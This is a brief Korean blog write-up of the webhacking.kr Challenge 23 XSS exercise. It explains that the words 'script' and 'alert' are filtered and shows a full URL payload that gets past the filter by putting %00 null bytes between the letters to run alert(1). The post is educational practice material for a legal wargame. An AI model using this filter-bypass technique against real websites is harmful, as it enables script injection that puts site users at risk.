[webhacking.kr] Challenge 23 - XSS
by jennysgap[webhacking.kr] Challenge 23 - XSS
이번엔 injection 문제 입니다.
소스코드를 보니 살펴볼게 없다.
<script>alert(1);</script>를 입력하니 no hack이라고 나왔다.
어떤 것들이 필터링 되는지 확인해봐야겠다.
일단 특수문자는 필터링 안되고
문자 script와 alert가 필터링되고 있다.
중간 스페이스를 넣어 입력해보니 그대로 출력됐다.
space는 +로 입력되니
NULL을 의미하는 %00를 문자 사이사이에 입력하자
http://webhacking.kr/challenge/bonus/bonus-3/index.php?code=<s%00c%00r%00i%00p%00t>a%00l%00e%00r%00t%00%28%001%00%29%3B<%2Fs%00c%00r%00i%00p%00t>
반응형
'BOX' 카테고리의 다른 글
| [webhacking.kr] Challenge 25 - LFI (Local File Inclusion) 취약점 (0) | 2019.06.20 |
|---|---|
| [webhacking.kr] Challenge 24 - Cookie (0) | 2019.06.20 |
| [webhacking.kr] Challenge 20 - Javascript (0) | 2019.06.20 |
| [webhacking.kr] Challenge 18 - SQL Injection (limit) (0) | 2019.06.20 |
| [webhacking.kr] Challenge 17 - Javascript (0) | 2019.06.20 |
블로그의 정보
jennysgap
jennysgap